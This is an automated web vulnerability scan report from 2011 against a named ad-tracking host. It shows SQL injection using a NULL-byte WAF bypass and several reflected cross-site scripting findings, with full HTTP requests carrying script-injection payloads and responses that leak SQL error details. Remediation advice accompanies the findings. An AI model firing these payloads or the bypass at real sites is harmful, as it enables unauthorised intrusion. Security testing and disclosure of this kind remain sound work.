XSS, SQL Injection, Cross Site Scripting, CWE-79, CAPEC-86, CWE-89, CAPEC-66, trk.vindicosuite.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Mar 08 07:51:30 CST 2011.


The DORK Report

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [name of an arbitrarily supplied request parameter]

2.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

2.3. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

2.4. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [Referer HTTP header]

2.5. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [User-Agent HTTP header]

2.6. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]

3. Cookie without HttpOnly flag set

3.1. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/

3.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

3.3. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/

3.4. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/

4. Cookie scoped to parent domain

5. HTML does not specify charset

5.1. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/

5.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

5.3. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/

6. Content type incorrectly stated



1. SQL injection  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request

GET /Tracking/V3/Instream/Clickthrough/?1%00'=1 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:59 GMT
Expires: Tue, 08 Mar 2011 12:14:59 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQSDDRQS=EPGPMOLCMMFJDHNOEHALGNNC; path=/
X-Powered-By: ASP.NET
Content-Length: 319
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Procedure or function 'Track_InstreamAdClickthrough_V.1' expects parameter '@campaignId', which was not supplied.<br>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d145a<script>alert(1)</script>93573ffc9a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V3/Instream/Clickthrough/?d145a<script>alert(1)</script>93573ffc9a6=1 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:55 GMT
Expires: Tue, 08 Mar 2011 12:14:56 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAADTRTS=AKCIJDNCPDMBDANLLGANGNCG; path=/
X-Powered-By: ASP.NET
Content-Length: 847
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near '<'.<br>SQL:[Track_InstreamAdClickthrough_V.1] @siteId = d145a<script>alert(1)</script>93573ffc9a6=1 , @syndicationOutletId = undefined , @instreamAdModuleId = undefined , @campaignId = undefined , @adrotationId = undefined , @ipAddress = '173.193.214.243' , @sessionId = '758760603', @ipNumber = '
...[SNIP]...

2.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1cd1d<script>alert(1)</script>32718d8f104 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;
Referer: http://www.google.com/search?hl=en&q=1cd1d<script>alert(1)</script>32718d8f104

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:51 GMT
Expires: Tue, 08 Mar 2011 12:15:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSTTCRTS=AELIJPMCHLIKKMEFGELBKCPD; path=/
X-Powered-By: ASP.NET
Content-Length: 832
Connection: Close

<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = , @bannerCreativeAdModuleId = undefined, @campaignId = undefined, @syndicationOutletId = undefined, @adrotationId = undefined, @ipAddress = '173.193.214.243', @sessionId = '754569859', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=1cd1d<script>alert(1)</script>32718d8f104', @browserName = 'IE', @browserVersion = '7.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows
...[SNIP]...

2.3. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload b2261<script>alert(1)</script>61b263ce21e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b2261<script>alert(1)</script>61b263ce21e
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:49 GMT
Expires: Tue, 08 Mar 2011 12:15:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSQTASSR=JNDJKOMCGPLLJPEKLJAFEGGC; path=/
X-Powered-By: ASP.NET
Content-Length: 668
Connection: Close

<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = , @bannerCreativeAdModuleId = undefined, @campaignId = undefined, @syndicationOutletId = undefine
...[SNIP]...
erName = 'Netscape', @browserVersion = '4.00', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b2261<script>alert(1)</script>61b263ce21e', @segment = 'undefined'<br>
...[SNIP]...

2.4. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d7a92<script>alert(1)</script>7e14b1055fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V3/Instream/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;
Referer: http://www.google.com/search?hl=en&q=d7a92<script>alert(1)</script>7e14b1055fa

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:59 GMT
Expires: Tue, 08 Mar 2011 12:15:00 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSTTCRTS=HHLIJPMCHLNJEFFFLLLEEPEC; path=/
X-Powered-By: ASP.NET
Content-Length: 947
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_Instrea
...[SNIP]...
undefined , @campaignId = undefined , @adrotationId = undefined , @ipAddress = '173.193.214.243' , @sessionId = '754569919', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=d7a92<script>alert(1)</script>7e14b1055fa', @browserName = 'IE', @browserVersion = '7.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows
...[SNIP]...

2.5. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a2500<script>alert(1)</script>b705de07e81 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V3/Instream/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2500<script>alert(1)</script>b705de07e81
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:57 GMT
Expires: Tue, 08 Mar 2011 12:14:58 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSQTASSR=FBEJKOMCPKDAHDODNHGNEPDH; path=/
X-Powered-By: ASP.NET
Content-Length: 852
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_Instrea
...[SNIP]...
erName = 'Netscape', @browserVersion = '4.00', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2500<script>alert(1)</script>b705de07e81', @segment = 'undefined', @issuedIdentityGuid = '55be4d72-6815-4aa7-8066-9042bb4a2d39'<br>
...[SNIP]...

2.6. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The value of the VINDICOAUDIENCEISSUEDIDENTITY cookie is copied into the HTML document as plain text between tags. The payload 863ca<script>alert(1)</script>b4250103f5f was submitted in the VINDICOAUDIENCEISSUEDIDENTITY cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Tracking/V3/Instream/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39863ca<script>alert(1)</script>b4250103f5f; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:34 GMT
Expires: Tue, 08 Mar 2011 12:14:35 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSTTDRTQ=FGGGJOMCFEAPAIDLFLCFBMOM; path=/
X-Powered-By: ASP.NET
Content-Length: 845
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_Instrea
...[SNIP]...
= 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)', @segment = 'undefined', @issuedIdentityGuid = '55be4d72-6815-4aa7-8066-9042bb4a2d39863ca<script>alert(1)</script>b4250103f5f'<br>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Clickthrough/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Tracking/V2/BannerCreative/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:26 GMT
Expires: Tue, 08 Mar 2011 12:14:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSTTDRTQ=NBGGJOMCHKLPDGNCJANMJNGO; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: Close

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

3.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:28 GMT
Expires: Tue, 08 Mar 2011 12:15:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQTRDSSR=ACJNLOMCMADFPAMBGNBNDGJI; path=/
X-Powered-By: ASP.NET
Content-Length: 620
Connection: Close

<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = , @bannerCreativeAdModuleId = undefined, @campaignId = undefined, @syndicationOutletId = undefine
...[SNIP]...

3.3. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Tracking/V3/Instream/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:31 GMT
Expires: Tue, 08 Mar 2011 12:14:31 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAADTRTS=IOBIJDNCOOAIEOEIDGKOBDBG; path=/
X-Powered-By: ASP.NET
Content-Length: 804
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_Instrea
...[SNIP]...

3.4. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Impression/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Tracking/V3/Instream/Impression/?0|1417|48355|35745|6416|13079|HEADER|912|2479|1|BBEEND||TGT{1|2|3|77|882}|&internalRedirect=false HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Date: Mon, 07 Mar 2011 01:01:23 GMT
Expires: -1
Location: /tracking/dot.gif
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; domain=.vindicosuite.com; expires=Wed, 06-Apr-2011 00:01:24 GMT; path=/
Set-Cookie: vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; domain=.vindicosuite.com; expires=Wed, 06-Apr-2011 00:01:24 GMT; path=/
Set-Cookie: 55be4d72-6815-4aa7-8066-9042bb4a2d39_vpp=; domain=.vindicosuite.com; expires=Sat, 05-Mar-2011 05:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive


4. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Impression/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /Tracking/V3/Instream/Impression/?0|1417|48355|35745|6416|13079|HEADER|912|2479|1|BBEEND||TGT{1|2|3|77|882}|&internalRedirect=false HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Date: Mon, 07 Mar 2011 01:01:23 GMT
Expires: -1
Location: /tracking/dot.gif
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; domain=.vindicosuite.com; expires=Wed, 06-Apr-2011 00:01:24 GMT; path=/
Set-Cookie: vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; domain=.vindicosuite.com; expires=Wed, 06-Apr-2011 00:01:24 GMT; path=/
Set-Cookie: 55be4d72-6815-4aa7-8066-9042bb4a2d39_vpp=; domain=.vindicosuite.com; expires=Sat, 05-Mar-2011 05:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive


5. HTML does not specify charset  previous  next
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


5.1. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
